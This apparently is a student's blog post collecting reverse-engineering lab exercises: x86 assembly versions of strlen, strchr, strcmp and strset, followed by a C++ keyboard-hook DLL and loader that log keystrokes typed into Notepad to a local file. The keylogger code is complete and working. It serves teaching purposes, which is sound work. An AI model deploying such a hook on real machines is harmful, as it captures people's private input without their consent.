• 12.24逆向工程上机作业整理


    .386
    .model flat, stdcall
    
    include kernel32.inc
    includelib kernel32.lib
    
    include msvcrt.inc
    includelib msvcrt.lib
    
    .data
    szText    db    "Reverse Engineering", 0
    format    db    "length = %d", 0AH, 0
    
    .code
    
    main PROC
        LEA EDI, szText
        MOV ECX,0FFFFFFFFH
        MOV AL,0
        MOV BL,0
        RE:
            CMP BYTE PTR [EDI],BL
            JZ EXIT
            INC EDI
            INC AX
            JMP RE
        EXIT:
        
        INVOKE crt_printf, addr format, AL
        INVOKE crt_getchar
        INVOKE ExitProcess, 0
    main ENDP
    
    END main
    strlen
     1 .386
     2 .model flat, stdcall
     3 
     4 include kernel32.inc
     5 includelib kernel32.lib
     6 
     7 include msvcrt.inc
     8 includelib msvcrt.lib
     9 
    10 .data
    11 szText    db    "Reverse Engineering", 0
    12 chr        db    'i'
    13 format    db    "%d", 0AH, 0
    14 
    15 .code
    16 
    17 main PROC
    18     LEA EDI, szText
    19     MOV ECX,0FFFFFFFFH
    20     ;LEA AX,chr
    21     MOV BL,CHR
    22     MOV AL,0
    23     RE:
    24         CMP BYTE PTR [EDI],BL
    25         JZ EXIT
    26         INC EDI
    27         INC AL
    28         JMP RE
    29     EXIT:
    30     
    31     
    32     INVOKE crt_printf, addr format, AL
    33     INVOKE crt_getchar
    34     INVOKE ExitProcess, 0
    35 main ENDP
    36 
    37 END main
    strchr
     1 .386
     2 .model flat, stdcall
     3 
     4 include kernel32.inc
     5 includelib kernel32.lib
     6 
     7 include msvcrt.inc
     8 includelib msvcrt.lib
     9 
    10 .data
    11 format        db    "%d", 0AH, 0
    12 szText        db    "Reverse Engineering", 0
    13 szText2        db    "Reverse Engineering", 0    ;szText==szText2
    14 szText3        db    "Reverse Eng", 0            ;szText>szText3
    15 szText4        db    "Reverse Engj", 0            ;szText<szText4
    16 szText5        db    "Reverse Engh", 0            ;szText>szText5
    17 
    18 .code
    19 
    20 main PROC
    21     LEA ESI, szText
    22     ;LEA EDI, szText2    ;result=0
    23     ;LEA EDI, szText3    ;result=1
    24     ;LEA EDI, szText4    ;result=-1
    25     LEA EDI, szText5    ;result=1
    26 START:                        
    27     lodsb                    ;将ds:esi的第一个字节装入寄存器AL,同时[esi]+1
    28     scasb                    ;将es:edi的第一个字节和AL相减,同时[edi]+1
    29     jne NOTEQ                ;为0时跳转
    30     test al,al                
    31     jne START            
    32     xor eax,eax                ;将EAX置0
    33     jmp ENDCMP                
    34 NOTEQ:                      
    35     mov eax,1                
    36     jg ENDCMP                ;jl是小于
    37     neg eax                    
    38 ENDCMP:     
    39     
    40     
    41     INVOKE crt_printf, addr format, EAX
    42 
    43     INVOKE crt_getchar
    44     INVOKE ExitProcess, 0
    45 main ENDP
    46 
    47 END main
    strcmp
     1 .386
     2 .model flat, stdcall
     3 
     4 include kernel32.inc
     5 includelib kernel32.lib
     6 
     7 include msvcrt.inc
     8 includelib msvcrt.lib
     9 
    10 .data
    11 szText    db    "Reverse Engineering", 0
    12 chr        db    'j'
    13 
    14 .code
    15 
    16 main PROC
    17     LEA EDI, szText
    18     MOV ECX,0FFFFFFFFH
    19     MOV BL,CHR
    20     RE:
    21         CMP BYTE PTR [EDI],BL
    22         JZ EXIT
    23         MOV [EDI],BL
    24         INC EDI
    25         JMP RE
    26     EXIT:
    27     INVOKE crt_printf, addr szText
    28 
    29     INVOKE crt_getchar
    30     INVOKE ExitProcess, 0
    31 main ENDP
    32 
    33 END main
    strset

    #include "stdio.h"
    #include "windows.h"
    #include<fstream>
    #include<iostream>
    HINSTANCE g_hInstance = NULL;
    HHOOK g_hHook = NULL;
    HWND g_hWnd = NULL;
    
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved) {//第三个参数没有意义
        switch (dwReason) {
        case DLL_PROCESS_ATTACH:
            g_hInstance = hinstDLL;
            break;
    
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
    
    LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){
        char szPath[MAX_PATH] = { 0, };
        char *p = NULL;
    
    
    
        if (nCode >= 0) {
            std::ofstream out("D:\reverse\input.txt", std::ios::app);
            //输出流,记录键值
            // bit 31 : 0 => press, 1 => release
            if (!(lParam & 0x80000000)) {
                GetModuleFileNameA(NULL, szPath, MAX_PATH);
                p = strrchr(szPath, '\');
                //若加载当前DLL的进程的可执行文件名称为notepad.exe,则消息不会传递给下一个钩子
                if (!_stricmp(p + 1, "notepad.exe")) {
                        BYTE   ks[256];
                        GetKeyboardState(ks);
                        WORD   w;
                        UINT   scan;
                        scan = 0;
                        ToAscii(wParam, scan, ks, &w, 0);
                        char ch = (char)w;
                        out << ch;
                }
            }
            out.close();
        }
        // 当前进程不是notepad.exe,将消息传递给下一个钩子
    
        return CallNextHookEx(g_hHook, nCode, wParam, lParam);
    }
    
    #ifdef __cplusplus
    extern "C" {
    #endif
        __declspec(dllexport) void HookStart() {
            g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0);
        }
    
        __declspec(dllexport) void HookStop() {
            if (g_hHook) {
                UnhookWindowsHookEx(g_hHook);
                g_hHook = NULL;
            }
        }
    #ifdef __cplusplus
    }
    #endif
    KeyHook.dll
    #include "stdio.h"
    #include "conio.h"
    #include "windows.h"
    
    #define    DEF_DLL_NAME        "KeyHook.dll"
    #define    DEF_HOOKSTART        "HookStart"
    #define    DEF_HOOKSTOP        "HookStop"
    
    typedef void (*PFN_HOOKSTART)();
    typedef void (*PFN_HOOKSTOP)();
    
    void main()
    {
        HMODULE            hDll = NULL;
        PFN_HOOKSTART    HookStart = NULL;
        PFN_HOOKSTOP    HookStop = NULL;
        char            ch = 0;
    
        // KeyHook.dll
        hDll = LoadLibraryA(DEF_DLL_NAME);
        if( hDll == NULL )
        {
            printf("LoadLibrary(%s) failed!!! [%d]", DEF_DLL_NAME, GetLastError());
            return;
        }
    
        // export
        HookStart = (PFN_HOOKSTART)GetProcAddress(hDll, DEF_HOOKSTART);
        HookStop = (PFN_HOOKSTOP)GetProcAddress(hDll, DEF_HOOKSTOP);
    
    
        HookStart();
    
    
        printf("press 'q' to quit!
    ");
        while( _getch() != 'q' )    ;
    
    
        HookStop();
        
      
        FreeLibrary(hDll);
    }
    HookMain.cpp
  • 相关阅读:
    Docker Weave 命令整理
    Docker Weave 介绍 or 工作原理
    Docker Macvlan 应用部署
    Docker Macvlan 介绍 or 工作原理
    Linux Centos 7.4 内核升级
    Docker Overlay 应用部署
    Docker Overlay 工作原理
    Docker Overlay 介绍
    Openfire:安装指南
    Android WebRTC 音视频开发总结(一)
  • 原文地址:https://www.cnblogs.com/elpsycongroo/p/8099052.html
Copyright © 2020-2023  润新知